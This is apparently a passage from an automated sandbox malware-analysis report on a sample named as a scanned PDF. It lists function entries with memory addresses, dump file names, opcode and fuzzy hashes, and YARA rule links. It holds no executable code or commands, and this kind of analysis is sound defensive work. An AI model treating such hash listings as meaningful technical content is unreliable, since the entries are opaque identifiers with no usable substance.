                                                                          • Snapshot File: hcaresult_0_2_124d000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6a06c881b6ae2dff1512e9684dece2df39f4ff51221627844cfd168c911828e5
                                                                          • Instruction ID: 4e4935c5e54c4b64cf5724236e7a35651f42e5003483b2dc9d99a20549c7b4d8
                                                                          • Opcode Fuzzy Hash: 6a06c881b6ae2dff1512e9684dece2df39f4ff51221627844cfd168c911828e5
                                                                          • Instruction Fuzzy Hash: 11F062714093889FF7158A19D984B62FF98EB51624F18C45AEE484A6C7C2799844CAB1
                                                                          Function 072A580E Relevance: .0, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8593851f1b507eb9548999ee57cbd7461eb4dfc2f3f3ac936ae7e4c5d37ee9c0
                                                                          • Instruction ID: 9f7ea14f11882d1856015d069635f8ad12e8b1a05e74d6765cac9c48b692e65f
                                                                          • Opcode Fuzzy Hash: 8593851f1b507eb9548999ee57cbd7461eb4dfc2f3f3ac936ae7e4c5d37ee9c0
                                                                          • Instruction Fuzzy Hash: B3011E74A10228CFDB68DF18D894BAA77B2FB88704F1042D4D509A3758CF319D85CF50
                                                                          Function 01320BC0 Relevance: .0, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d1927e49b30427bcde8a07d9567abf37a819696ab0a0ec2e23e01760a2b06c88
                                                                          • Instruction ID: 6eb6448b5980462d152f8a889f717a5cf83797b0c94a045f09fe41a1e94e58bf
                                                                          • Opcode Fuzzy Hash: d1927e49b30427bcde8a07d9567abf37a819696ab0a0ec2e23e01760a2b06c88
                                                                          • Instruction Fuzzy Hash: 10F08272E106199BDF18EB64C8659EFBFF69F84710F05893AE502AB340DFB0590A86D1
                                                                          Function 01320840 Relevance: .0, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: da3f4438df628ee1264e0729f5d55685129a4da4998a1cfd5d2fbdb3dd52eabc
                                                                          • Instruction ID: 9a44b903fb58a724f330e6dfa4db3395ef64d79ff832f457f493c7ad14407398
                                                                          • Opcode Fuzzy Hash: da3f4438df628ee1264e0729f5d55685129a4da4998a1cfd5d2fbdb3dd52eabc
                                                                          • Instruction Fuzzy Hash: 6BF0E273925244EFCB41CF74D95198D3BB1EB42308B1485DFC008DB122D63A9E089B11
                                                                          Function 0132E668 Relevance: .0, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1f4331dcbe2f5664778382eca5999acd271b1157c6bbe354c6d96b7bf5b9d26b
                                                                          • Instruction ID: fff2620d0fed5e343fc5cdb1dae052292c0a065938e0d7da49cf827d55b8f015
                                                                          • Opcode Fuzzy Hash: 1f4331dcbe2f5664778382eca5999acd271b1157c6bbe354c6d96b7bf5b9d26b
                                                                          • Instruction Fuzzy Hash: FAF0A575D04208EFCB94EFA8D845AACBBB5EB48314F10C1AADC1893350D6329A55DF40
                                                                          Function 01320979 Relevance: .0, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 758bfb6c6d90a4c68193e5aebdcfe3182892d4311463b5d759f954c1e901d637
                                                                          • Instruction ID: 164c0270a85a8d945f4b0a8ff3bcb7e8348e727b5bf4cf9898b79d71ed251ef2
                                                                          • Opcode Fuzzy Hash: 758bfb6c6d90a4c68193e5aebdcfe3182892d4311463b5d759f954c1e901d637
                                                                          • Instruction Fuzzy Hash: 24E026383153849FC702EB38D448D4A3FF5AF8B22471400DAE804CB336CA329C01C790
                                                                          Function 072BA740 Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5ddcd70b549eb8d252234f360867b3cceed74cc0d7451585327c64236f23b970
                                                                          • Instruction ID: 528387eee2e9db4e98f91ae33b220c099e9cde25966ec6e4274ade23ccf97c16
                                                                          • Opcode Fuzzy Hash: 5ddcd70b549eb8d252234f360867b3cceed74cc0d7451585327c64236f23b970
                                                                          • Instruction Fuzzy Hash: D2E0C9B4D14208EFCB94DFA8D5446ACBBF4EB48300F10C5AA9C1893341D6719E51EF80
                                                                          Function 072BBD98 Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5ddcd70b549eb8d252234f360867b3cceed74cc0d7451585327c64236f23b970
                                                                          • Instruction ID: 0fdc3e84141f6367bb2098eceaa8b8a38572197af4b142a6389a765cfb2a0ff5
                                                                          • Opcode Fuzzy Hash: 5ddcd70b549eb8d252234f360867b3cceed74cc0d7451585327c64236f23b970
                                                                          • Instruction Fuzzy Hash: 4CE0C2B4E14208EFCB64DFA8D844AADBBF5EB48300F10C1AA9C08A3340D6759A51DF80
                                                                          Function 072BD838 Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5ddcd70b549eb8d252234f360867b3cceed74cc0d7451585327c64236f23b970
                                                                          • Instruction ID: 98a0b869e889faf475c94066a7d28fa9431eb31695ca096158ab5995a2142609
                                                                          • Opcode Fuzzy Hash: 5ddcd70b549eb8d252234f360867b3cceed74cc0d7451585327c64236f23b970
                                                                          • Instruction Fuzzy Hash: 6BE0C9B4E14208EFCB54DFA8D8446ACBBF5EB48305F10C1AA980893341D6759A52DF40
                                                                          Function 072B5E88 Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5ddcd70b549eb8d252234f360867b3cceed74cc0d7451585327c64236f23b970
                                                                          • Instruction ID: 3d42813695df71890182315461db87239b42db6f34ced8c229ef21180fd75076
                                                                          • Opcode Fuzzy Hash: 5ddcd70b549eb8d252234f360867b3cceed74cc0d7451585327c64236f23b970
                                                                          • Instruction Fuzzy Hash: 55E0E5B4E14208EFCB54DFA9D844AADFBF4EB48300F10C1AAAC18A7340D7719A51DF80
                                                                          Function 05B016F8 Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c5ac75c3711cb6883ceef73dddaf0e0b552056fbc394a506e2a82c1dbbe5cdc3
                                                                          • Instruction ID: 4752522ef3840c9228d87b51f05b3ffafb4e2867c6c3f57805f895354b508a1c
                                                                          • Opcode Fuzzy Hash: c5ac75c3711cb6883ceef73dddaf0e0b552056fbc394a506e2a82c1dbbe5cdc3
                                                                          • Instruction Fuzzy Hash: 39E03974808248AFCB48DF98D8406BCBFB8EB49300F10C0EAAC5892291D631AA51EF50
                                                                          Function 05B03668 Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f206809c54bebe28bb9147ec0b68d52d944c19d369d2c68171439485d566d93b
                                                                          • Instruction ID: 57b165313b751c1b79c769fc9ca337dd013fac2ccd4869dabfba6b97132bd713
                                                                          • Opcode Fuzzy Hash: f206809c54bebe28bb9147ec0b68d52d944c19d369d2c68171439485d566d93b
                                                                          • Instruction Fuzzy Hash: 02E06D3540820CEBCB01CF90D9449ADBFB5FB49300F108599EC0513350C7329A61EF40
                                                                          Function 05B03E40 Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f206809c54bebe28bb9147ec0b68d52d944c19d369d2c68171439485d566d93b
                                                                          • Instruction ID: 20a314d7e1f83a1058be0dbb6502eff9d941f9cff8dc0aea583a394ac2e077d7
                                                                          • Opcode Fuzzy Hash: f206809c54bebe28bb9147ec0b68d52d944c19d369d2c68171439485d566d93b
                                                                          • Instruction Fuzzy Hash: F0E06D3540420CEBCF01CF90D8449ADBFB5FB49300F108599EC0413250C7329A61EB50
                                                                          Function 072BDF10 Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d3136768ab12a8ac7f1ae57a4d0fb5e60b5a1e35d26dcba0bd3c3fb6ccee09c9
                                                                          • Instruction ID: 8bd07b67621529f6a8a97d51410b9f8a810fd0e446820c8bec31b77e2f422ee4
                                                                          • Opcode Fuzzy Hash: d3136768ab12a8ac7f1ae57a4d0fb5e60b5a1e35d26dcba0bd3c3fb6ccee09c9
                                                                          • Instruction Fuzzy Hash: D5E0E5B4E19208EFCB94DFA9D4446ACBBF4EB48300F10C1AAD81893344D675AA42CF80
                                                                          Function 05B01418 Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: afa8bbeebed1dbb3ae4023f6fcbecc593e9c57b294a2944b1d2f3c207cd5cdae
                                                                          • Instruction ID: 1db9c10005fb33e83830621443227ec3d1e0cb4cfa079cfd795cea08a0450696
                                                                          • Opcode Fuzzy Hash: afa8bbeebed1dbb3ae4023f6fcbecc593e9c57b294a2944b1d2f3c207cd5cdae
                                                                          • Instruction Fuzzy Hash: 5FE0E574E44208EFCB84DFA8D8446ACBBF4FB48304F50C1EA884893350D731AA42CF40
                                                                          Function 0132ED50 Relevance: .0, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d36fe9a99b7a56e7fb75b1b683cb7023a6484940069707f52b6192295cfaf4fc
                                                                          • Instruction ID: f1342c80f1ffa0043abdd0f16f0037c8465e855a1cfcfda1d07f938b4701d7ea
                                                                          • Opcode Fuzzy Hash: d36fe9a99b7a56e7fb75b1b683cb7023a6484940069707f52b6192295cfaf4fc
                                                                          • Instruction Fuzzy Hash: 2CE0867590821CEFC714EF98E841A7DBFB8AB45304F10C1AADC4857341C6319E41DB90
                                                                          Function 072B8B50 Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 59ae7f5f262400c4b6fe05a4cbf43b7dd5abee4db8d93e9d41058e4b7a99725b
                                                                          • Instruction ID: 4a0a4162de0f18b0df37cb5d25a95b1a4aad96fa092e5543562c2a7693a9fe98
                                                                          • Opcode Fuzzy Hash: 59ae7f5f262400c4b6fe05a4cbf43b7dd5abee4db8d93e9d41058e4b7a99725b
                                                                          • Instruction Fuzzy Hash: 89E012B4D08208EFCB14DBA8D4406ACFBB8AB89300F1481EA881893381D7729A42DF84
                                                                          Function 05B015E8 Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bae181a47d7dea2886c425da8f90fcce95c38629e806dd2bce3a752d610e7840
                                                                          • Instruction ID: 397908078d9f5c53e5231c9c26569f0b5b07535d0e5e8c1e0cc5b7ef0cf3cdb8
                                                                          • Opcode Fuzzy Hash: bae181a47d7dea2886c425da8f90fcce95c38629e806dd2bce3a752d610e7840
                                                                          • Instruction Fuzzy Hash: D1E04634908208EBCB09DF98EC45AADBBB9EB45301F1491A99C0923380D632EE52DF84
                                                                          Function 072BE370 Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d518be9ca728dea2d37a009ebebf2973725c32e14cc011d867278a6c048c632d
                                                                          • Instruction ID: a4c6820875642ee9e57d80c247adc9dde58642080654afb6a263e2102df9a43e
                                                                          • Opcode Fuzzy Hash: d518be9ca728dea2d37a009ebebf2973725c32e14cc011d867278a6c048c632d
                                                                          • Instruction Fuzzy Hash: 0FE08C74918208DBC714DF94E8406BCBBB8AB45300F108199C80813340C671AE46CB80
                                                                          Function 072BB6F0 Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 16afff5c64c1a647fd730e16b1681448cdb8f925de9b7fe149a3f2815802b62f
                                                                          • Instruction ID: fa58679b232595dde75f1582d8d8ae41daa125c5dc3560f31ae3b21362f3c1cb
                                                                          • Opcode Fuzzy Hash: 16afff5c64c1a647fd730e16b1681448cdb8f925de9b7fe149a3f2815802b62f
                                                                          • Instruction Fuzzy Hash: FFE0C2B240120CDBC710FFF4C80069E77F8DB04200F4000A6C40893140EE715A009B92
                                                                          Function 0132D608 Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5f465d55ca04f0e27914f6923cc4b812a9b6afd32e3dfc218bd55c7c0e4c7893
                                                                          • Instruction ID: cc206b243616e9bc08055886fe02e8f6beab61f0deca31f0b5bbac7aef326754
                                                                          • Opcode Fuzzy Hash: 5f465d55ca04f0e27914f6923cc4b812a9b6afd32e3dfc218bd55c7c0e4c7893
                                                                          • Instruction Fuzzy Hash: 1EE0C272800208EFC740EFF4D80475E7BF9EB0A300F0010A6DA0993210EF714E009BA2
                                                                          Function 05B020B0 Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 37bb3c4e424394028f51b6c9d855c530eeb2b7f55a7192072b6d37eb16ebe874
                                                                          • Instruction ID: b8674faa32089390f532a2774f0ee2d0743f183379988da21d16e83b2b892683
                                                                          • Opcode Fuzzy Hash: 37bb3c4e424394028f51b6c9d855c530eeb2b7f55a7192072b6d37eb16ebe874
                                                                          • Instruction Fuzzy Hash: 88E0127894930CDBC704DF94E94566DFBB9EB45304F2091EACC0917381D772AE46DB91
                                                                          Function 05B01388 Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 589971125e16d403a2e3540cbe0fef277e8eb2ebf56bb5cff52d28df1ad14a37
                                                                          • Instruction ID: ef3d27411e36bbe1662905f1cba64813c121b60ebf2a98b96c6fb372d89cc435
                                                                          • Opcode Fuzzy Hash: 589971125e16d403a2e3540cbe0fef277e8eb2ebf56bb5cff52d28df1ad14a37
                                                                          • Instruction Fuzzy Hash: D2E01270D4624CEFC754EFB8D8457ADBBF9AB45201F5051E9880993240E7715A40DB41
                                                                          Function 05B018E0 Relevance: .0, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 37bb3c4e424394028f51b6c9d855c530eeb2b7f55a7192072b6d37eb16ebe874
                                                                          • Instruction ID: 3b44d23166956a90b700b8487b0e3f67043eab6103046b66ba2f8fc441a00642
                                                                          • Opcode Fuzzy Hash: 37bb3c4e424394028f51b6c9d855c530eeb2b7f55a7192072b6d37eb16ebe874
                                                                          • Instruction Fuzzy Hash: 63E0EC34949308DBC708DB98E94567CBBB9EB45314F1091DD880917381D671AE42DB81
                                                                          Function 05B00CA8 Relevance: .0, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 45e6de9a67ffab7b21a0385128e4f1f8b30320f7cd9fcc156d5d39d7fa0a11de
                                                                          • Instruction ID: e892a613ad0f112420dc83c8cb33b99b1e7882dfb2905c7870f018e7b4d6d73c
                                                                          • Opcode Fuzzy Hash: 45e6de9a67ffab7b21a0385128e4f1f8b30320f7cd9fcc156d5d39d7fa0a11de
                                                                          • Instruction Fuzzy Hash: 44E08C3090924C9BC750EBA4D84476CBFF8AB05210F5080E9C84853381D631AE42CB40
                                                                          Function 05B02790 Relevance: .0, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 45e6de9a67ffab7b21a0385128e4f1f8b30320f7cd9fcc156d5d39d7fa0a11de
                                                                          • Instruction ID: fa1c94f6639d33c78bf828c6441de4d0286c824c392103615c16feac55080423
                                                                          • Opcode Fuzzy Hash: 45e6de9a67ffab7b21a0385128e4f1f8b30320f7cd9fcc156d5d39d7fa0a11de
                                                                          • Instruction Fuzzy Hash: FCE0C238808208DFC704DBA4D84837CFFB8EB85210F1080D9CC0853381D632AE46CB40
                                                                          Function 05B02A50 Relevance: .0, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2283005490.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5ab0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 20f8483a21293280af14025554ba362ad29ee143a7d3b2af02c5517c2b5f0222
                                                                          • Instruction ID: 17651993b91f690dfbfd542703497fc3e66bbccc844f656a86af14f36325952b
                                                                          • Opcode Fuzzy Hash: 20f8483a21293280af14025554ba362ad29ee143a7d3b2af02c5517c2b5f0222
                                                                          • Instruction Fuzzy Hash: DED05E35949208DFC714CB94D948A68F7BCEB46204F50A0DD880953381DB72AE05CB40
                                                                          Function 01320868 Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 52a03471db298d381d99de92cbda429e7bab63fb918239874a4cd20acace097d
                                                                          • Instruction ID: 4ed7d841e5709a98a329b8cf69aea1e3f4f04a592b613ce0877fcbdd01e01535
                                                                          • Opcode Fuzzy Hash: 52a03471db298d381d99de92cbda429e7bab63fb918239874a4cd20acace097d
                                                                          • Instruction Fuzzy Hash: B1D01770A1120DEB8B44EFA8E94455DBBB9EB44208B1091A9D80CE3211EA716E009B80
                                                                          Function 072BE780 Relevance: .0, Instructions: 12COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2285605041.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_72a0000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8a4bddb513f0a7cb62bc309a67a26bca6cec8b1244a26c3f18b0a61d596af9a3
                                                                          • Instruction ID: c71e9aeb60afc0facb7c285c5176880c9ccca3fe2d44e233d1ba211920e70f16
                                                                          • Opcode Fuzzy Hash: 8a4bddb513f0a7cb62bc309a67a26bca6cec8b1244a26c3f18b0a61d596af9a3
                                                                          • Instruction Fuzzy Hash: CEC02BB60BA34E93C3309A50788C3F437AC8F0B305F5224004B0C0002117F04490DB91
                                                                          Function 0132D438 Relevance: .0, Instructions: 11COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2262259084.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1320000_rScan_0984829339_PDF.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 20c99389f841b4e963ffe19008cf242373ca3b27fe2601d2bf4c616531e61475
                                                                          • Instruction ID: a5d5babaaa7f38b0796d3a424ef070edc8a843ea7afb7fcdbf8a42a292038482
